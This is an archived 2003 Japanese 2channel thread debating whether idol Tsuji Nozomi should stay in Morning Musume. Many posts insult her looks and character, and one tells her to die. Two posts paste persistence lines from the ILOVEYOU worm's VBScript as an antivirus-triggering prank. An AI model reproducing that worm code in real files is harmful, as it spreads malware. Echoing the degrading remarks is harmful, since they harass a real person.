5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【徹底討論】辻って必要か?

1 :名無し募集中。。。:03/10/11 20:10
バカの一つ覚えで食い物ネタばっかだし

ブスなのに泣けば済むと思ってるし

ハワイ握手会サボるし

そのくせ食事会はしっかり出るし

雑魚メン懐柔して派閥作りに必死だし

足太いし

ゴリラだし

2 :ななたん ◆PbFuckAPus :03/10/11 20:10
       ヽ|/
     / ̄ ̄ ̄`ヽ、
    /         ヽ
   /  ノ'' ll ''ヽ ノ( |ピキッ
   | (●) (●) ⌒ |
   |  / ̄⌒ ̄ヽ   |   オニーサン達ィ ・・・ここが”新スレ”なんかよ!?
   |  | .l~ ̄~ヽ |   |
   |  ヽ  ̄~ ̄ ノ   |
   |    ̄ ̄ ̄    |

3 :フィリプ ◆OMuGDhX66U :03/10/11 20:10
( ´ Д `)<オマーンコーナーキック

4 :ビー玉のお京(*^-^) ◆P6VgSXwE.s :03/10/11 20:11
黙れ!若禿バーコード!

5 :名無し募集中。。。:03/10/11 20:11
いらないね

6 :名無し募集中。。。:03/10/11 20:11
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")



7 :名無し募集中。。。:03/10/11 20:11
  ∩ ∩ニヤニヤ
 ( ・∀・)<イルネ

8 :名無し募集中。。。:03/10/11 20:12
>>6
ゴリヲタいきなり必死だな(ワラ

9 :名無し募集中。。。:03/10/11 20:12
必要と思う。

10 :名無し募集中。。。:03/10/11 20:14
これはそのままドザ美ちゃんに当てはまるね

11 :名無し募集中。。。:03/10/11 20:15
辻が娘に居続けるのは他メンにとってどうかと思うけどな
飯田や石川や藤本ってのは、明らかに辻を嫌ってそうだし
マジで早く娘から抜けて欲しいと思ってそうだ
他メンに悪影響を与え続ける辻が娘に留まり続けるってのは良くないと思う
娘の為を思えば、辻は早く卒業すべき

12 :名無し募集中。。。:03/10/11 20:18
( ^▽^)<インター♪

13 :名無し募集中。。。:03/10/11 20:58
必要ない早くやめて欲しい
辻を見て気分が悪くなる人がいることも考えてください事務所の方々
冗談抜き

14 :名無し募集中。。。 :03/10/11 21:00
>>1
必要だよ

おしまい




15 :孤高ノ侍 ◆SNOWn.dlwc :03/10/11 21:00
いらないよ。
辞めれば気持ち悪い顔をしたオタクが減るよ。

16 :名無し募集中。。。:03/10/11 21:07
>>15
お前マジ氏ねよ

17 :名無し募集中。。。:03/10/11 21:09
娘。には不要なので
動物園にでも逝って下さい

18 :名無し募集中。。。:03/10/11 21:10
チェケガッペ

19 :名無し募集中。。。:03/10/11 21:10
ののたんは地球の宝物

20 :名無し募集中。。。:03/10/11 21:10
ののたん

21 :名無し募集中。。。:03/10/11 21:10
ののたんチュキチュキ

22 :名無し募集中。。。:03/10/11 21:13
超過密スケジュールの娘。たちはストレスをののの笑顔で癒しているのです。

23 :名無し募集中。。。:03/10/11 21:16
まあ癒されてるのは安倍と飯田くらいだろうから
安倍が卒業したら廃業してほしいね

24 :名無し募集中。。。:03/10/11 21:17
>>11
ワラタ

25 :名無し募集中。。。:03/10/11 21:18
辻は取ってからが早いんです

26 :名無し募集中。。。:03/10/11 21:18
辻は娘。なんていう沈みゆく泥舟には乗せておくにはもったいない。
つーことで早く脱退してね。

27 :名無し募集中。。。:03/10/11 21:19
>>26
まだ岸までたどり着いてない

28 :名無し募集中。。。:03/10/11 21:20
こういうスレはもう必要ない 立てた>>1の存在価値を疑う

29 :名無し募集中。。。:03/10/11 21:22
俺のティンコにはののたんが必要

30 :名無し募集中。。。:03/10/11 21:23
× ボ,ブ,・,サ,,ッ,プ, 2,R,反,則,勝,ち, レ,ミ,ー,,ボ,ン,ヤ,ス,キ,ー ○

31 :名無し募集中。。。:03/10/11 21:23
芸能界から辞めろとまでは辻ヲタの人達が可哀想だから言わないけれど
娘。からは抜けていただきたい。
辻を見て気分が悪くなる人もいるんです
一人でやればいいとおもう。そのほうが辻ヲタさんにもいいんじゃないですか?
どうですか?

こうしていただければ娘。が出演している番組もみれるのですが

32 :名無し募集中。。。:03/10/11 21:24
辻ってキッズ以下じゃん

33 :名無し募集中。。。:03/10/11 21:25
>>31
その理論で逝けば俺は石川・高橋・道重に抜けてもらいたいな

34 :名無し募集中。。。:03/10/11 21:26
>>31
マジレスするとどのメンバーに当てはめても同じ文章が作れるわけだが・・・・ののたん並に馬鹿?

35 :名無し募集中。。。:03/10/11 21:26
だが考えてみればこの必要と言う言葉はどうなのだろうか?
つまりここで必要となれば例えば辻がいなくなった場合モー娘。は終わりだと言うことになるだろう。

では逆に考えるとそう言う意味で必要なメンバーと言うのはいるのだろうか?
こいつが辞めてしまったらもうモー娘。は完全に終わる、そんなメンバーは誰なのだろうか?
少なくとも俺にはそれが居るようには見えない。
何というか今、モー娘。は女子が居ればあとは誰でも良い、ただそれだけの様に見える

36 :名無し募集中。。。:03/10/11 21:27
    <―――――――――>

    >――――――――――<

このようにすると下の線が長く見えます、これが目の錯覚です


37 :名無し募集中。。。:03/10/11 21:27
>>33
あくまで個人的意見ですから
私は辻を見て気分が悪くなる
辻ヲタの方々には申し訳無いけど

38 :名無し募集中。。。:03/10/11 21:28
辻が死んでも代わりはいるもの・・・

39 :名無し募集中。。。:03/10/11 21:29
>>37
お前なあ、ちょっとくらい我慢しろよ!
俺だって居るぞ?モー娘。で見るに耐えない奴。キモイとしか言いようのない奴
名前とかあんまり出すとまた荒れるだろうから言わないが。

誰だって一人くらいいるんだからちょっとは我慢しろ!

40 :名無し募集中。。。:03/10/11 21:31
>>37
わがままボーイだな。じゃあ、見るな。以上

41 :名無し募集中。。。:03/10/11 21:31
狼にしては長文だな

42 :名無し募集中。。。:03/10/11 21:32
>ハワイ握手会サボるし
>そのくせ食事会はしっかり出るし

これが最悪
こんな奴娘にいらない

43 :名無し募集中。。。:03/10/11 21:33
妄想レスばかり

44 :名無し募集中。。。:03/10/11 21:33
>>37
皆同じ苦しみに耐えて生きているんだよ
それが社会生活ってもんだ
糞スレ立てるのも自由だがもうちょっと大人になろう

45 :名無し募集中。。。:03/10/11 21:35
>>39
耐えるというのはかなり厳しいですが極力視野に入らないようにします

ところで辻ヲタの方々>>31
>辻を見て気分が悪くなる人もいるんです
>一人でやればいいとおもう。そのほうが辻ヲタさんにもいいんじゃないですか?
について意見を聴きたいです


46 :名無し募集中。。。:03/10/11 21:36
羊でやれや

47 :名無し募集中。。。:03/10/11 21:36
>>45
だから、皆同じって結論でてるじゃん。正直ウザイわ。

48 :名無し募集中。。。:03/10/11 21:37
>>45
辻一人じゃ他メンとの絡みが見れないので困ります

49 :名無し募集中。。。:03/10/11 21:37
>>45
そりゃ推しメンだけで活動してくれたら嬉しいのは当たり前

で、それがどうかしたのか?

50 :名無し募集中。。。:03/10/11 21:38
【不幸のレス】
   このレスを見た人間は七日以内に死にます。

       ※あなたに訪れる死を回避する方法が一つだけあります。
     それはこのコピペを一時間以内に7つ、別のスレに貼り付ける事です。




51 :名無し募集中。。。:03/10/11 21:39
          彡彡ミミミミ
    彡彡○巛彡彡ミミミミミ○彡彡
   r、r.r 、彡彡巛巛巛巛巛巛巛    
  r |_,|_,|_,|彡      : : : :   |
  |_,|_,|_,|/⌒    /   \. |  <ののの話れすか?
  |_,|_,|_人そ(^i  ⌒  .(o o)⌒ヽ
  | )   ヽノ |.       ;    |
  |  `".`´  ノ    \   //
  人  入_ノ´    υ\/ ノ\
/  \_/\\       /|\\
      /   \ ト ───イ/  ヽヽ
     /      ` ─┬─ イ     i i


52 :名無し募集中。。。:03/10/11 21:41
【幸福のレス】
   このレスを見た人間は十日以上確実に生きられます。

       ※これを回避する方法はありません。

53 :名無し募集中。。。:03/10/11 21:42
こういうスレを立てるなんて
ホントデブ専ヲタはガキだな

54 :名無し募集中。。。:03/10/11 21:43
>>1の推しメンを晒してから辻の事を語れや

55 :名無し募集中。。。:03/10/11 21:44
今日三重紺で初めて見たけど完全に高橋加護ユニットじゃん
おとめより扱い悪いぞ>辻
なんで辻ヲタは今回だけのり気なの?そんなにいい曲か?

56 :名無し募集中。。。:03/10/11 21:44
辻ゴリラには早く消えてもらわないといけないですね!

57 :名無し募集中。。。:03/10/11 21:44
辻イラネ

58 :名無し募集中。。。:03/10/11 21:45
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")



59 :名無し募集中。。。:03/10/11 21:45
ゴリヲタ必死だな(藁

60 :名無し募集中。。。:03/10/11 21:46
辻ヲタですが今回のミニモニの衣装髪型すべてにあってないと思う

61 :名無し募集中。。。:03/10/11 21:46
>>58
ゴリヲタ泣くなw

62 :名無し募集中。。。:03/10/11 21:53
いらないよ。
辞めれば気持ち悪い顔をしたオタクが減るよ。

63 :名無し募集中。。。:03/10/11 21:54
キッズ以下の辻は(゚听)イラネ

64 :名無し募集中。。。:03/10/11 21:55
辻なんていない方がいいに決まってるだろ

65 :名無し募集中。。。:03/10/11 22:00
不要

66 :名無し募集中。。。:03/10/11 22:03
(・∀・)ビーアンビシャース♪

67 :名無し募集中。。。:03/10/11 22:04
辻がいなくなったら
限りなく寂しくなるよ
モーニング娘。は

68 :名無し募集中。。。:03/10/11 22:05
絶対殺伐とするだろうな。少なくとも今よりは

69 :名無し募集中。。。:03/10/11 22:08
付けっ鼻の辻ゴリラ

70 :名無し募集中。。。:03/10/11 22:14
辻の功績は大きかったけどもういらないよね

71 :名無し募集中。。。:03/10/11 22:16
ののたんは奇跡奇はんたのの
のたんは奇跡奇跡奇はんたの
たんは奇跡奇は奇跡奇はんた
んは奇跡奇はんは奇跡奇はん
は奇跡奇はんたんは奇跡奇は
奇跡奇はんたのたんは奇跡奇
跡奇はんたのののたんは奇跡
奇跡奇はんたのたんは奇跡奇
は奇跡奇はんたんは奇跡奇は
んは奇跡奇はんは奇跡奇はん
たんは奇跡奇は奇跡奇はんた
のたんは奇跡奇跡奇はんたの
ののたんは奇跡奇はんたのの

72 :名無し募集中。。。:03/10/11 22:19
辻(゚听)イラネ

73 :名無し募集中。。。:03/10/11 22:35
辻全然可愛くない

74 :名無し募集中。。。:03/10/11 22:53
フジにののたん登場!

75 :名無し募集中。。。:03/10/11 22:59
粘ってるなここ

76 :名無し募集中。。。:03/10/11 22:59
ののたん危うし!

77 :名無し募集中。。。:03/10/11 23:00
がんばれののたん!

78 :名無し募集中。。。:03/10/11 23:03
性悪だなののたん!

79 :名無し募集中。。。:03/10/11 23:06
時間稼ぎでスタミナ回復かののたん?

80 :名無し募集中。。。:03/10/11 23:07
反則負けかよののたん!

81 :名無し募集中。。。:03/10/12 02:19
ブサイクだなののたん!

82 :名無し募集中。。。:03/10/12 02:22
徹底討論はまだですか?

83 :名無し募集中。。。:03/10/12 02:23
ユーロの予選が始まるまでいる。

84 :名無し募集中。。。:03/10/12 02:29
終了か?

85 :名無し募集中。。。:03/10/12 12:03


86 :名無し募集中。。。:03/10/12 12:09
ソロでやれって奴は分かってない
素人・ののたんがグループ内でなりあがって行く様が良いんじゃねーか

87 :名無し募集中。。。:03/10/12 12:18
こいつには華というものが全くないな
うちのクラスの女子のがよっぽど華やかだ

88 :名無し募集中。。。:03/10/12 13:48
辻は嫌われ者だな

89 :名無し募集中。。。:03/10/12 14:12
結論

不要

90 :名無し募集中。。。:03/10/12 19:44
結論

絶対必要

91 :名無し募集中。。。:03/10/12 19:52
結論

絶対不要

92 :名無し募集中。。。:03/10/12 20:00
結論

>>1がイラネ

93 :名無し募集中。。。:03/10/12 22:50
辻イラネ

94 :名無し募集中。。。:03/10/12 23:08
必要だと思う・・・
http://musume.chat-jp.com/uploda/source/musume0874.jpg

95 :名無し募集中。。。:03/10/13 00:43
>>1
不要

96 :名無し募集中。。。:03/10/13 00:44
>>6
今日からノートン使ってるんだが、ほんとに反応するんだな・・・
びっくりしたよ。

97 :名無し募集中。。。:03/10/13 04:24
>>94
かわいいかもw
>>96
でもウイルスコードくらいでイチイチ反応すんのうざくね?
オレはつねにナマなんだが

98 :名無し募集中。。。:03/10/13 13:58
最終結論

不要

99 :名無し募集中。。。:03/10/13 13:59
辻なんてイラネ 氏ね

100 :名無し募集中。。。:03/10/13 14:00
辻ゴリラ

101 :名無し募集中。。。:03/10/13 14:12
>>94
ライトで飛ばし杉

結論    不要

102 ::03/10/13 16:43
勢いのないスレだな。ののヲタにすら放置されてる。

103 :亜依本パン:03/10/13 21:11
辻は臭そうだし
うるさそうだからいらない

104 :名無し募集中。。。:03/10/13 23:16
辻イラネ


105 :名無し募集中:03/10/13 23:33
高橋って必要なの?事務所に推されても何の結果も出せてないのに。

106 :名無し募集中。。。:03/10/14 00:06
ののたん以外は正直いらない

107 :亜依本パン:03/10/14 01:24
辻希美 http://clair.homeip.net/upload/img-box/img20031006122350.jpg


整形

108 :名無し募集中。。。:03/10/14 01:30
>>107
グロ

109 :亜依本パン:03/10/14 02:09
グロ画像とかブラクラ、ウイルスなんかじゃないよ。
辻の整形顔はグロだけどw


110 :名無し募集中。。。:03/10/14 16:21
辻て人気メンいじめすぎ
辻は新垣小川らとユニット組め

111 :亜依本パン:03/10/14 16:23
上に禿同
辻は性格悪いよ

112 :名無し募集中。。。:03/10/14 16:29
ttp://f22.aaacafe.ne.jp/~mirakoh/romamoh/img/uhyo095

「メイク中」って写真ヤバくないか 顔

113 :名無し募集中。。。:03/10/14 16:30
変顔してるだけじゃん

114 :名無し募集中。。。:03/10/14 16:31
変顔って言っても可愛げが少しぐらいあるもんだぞ

115 :名無し募集中。。。:03/10/14 16:34
矢口かと思った

116 :名無し募集中。。。:03/10/14 16:36
デコ出すな。で辻、今度は小川か
新垣紺野はどこいったー

117 :名無し募集中。。。:03/10/14 16:37
顔ヒドスギ

118 :名無し募集中。。。:03/10/14 20:42
イラネ

119 :名無し募集中。。。:03/10/14 20:48
(☆^。^)<いただきまーくん

120 :名無し募集中。。。:03/10/14 23:17
結論

超不要

121 :名無し募集中。。。:03/10/14 23:22
加護と小川は不要だが辻は必要

122 :亜依本パン:03/10/14 23:25
そんなことない
辻が一番不要


123 :名無し募集中。。。:03/10/15 12:20
ふつよう

124 :名無し募集中。。。:03/10/15 14:38
   ノノノハヽ  
    川VvV) <どっちやねん!
  / U  つ ビシッ
  し'⌒∪



125 :名無し:03/10/15 14:46
辻は必要。

いらないのは田中。

126 :亜依本パン:03/10/15 18:04
田中はこれから必要になってくるのでご安心を
辻は不必要

16 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)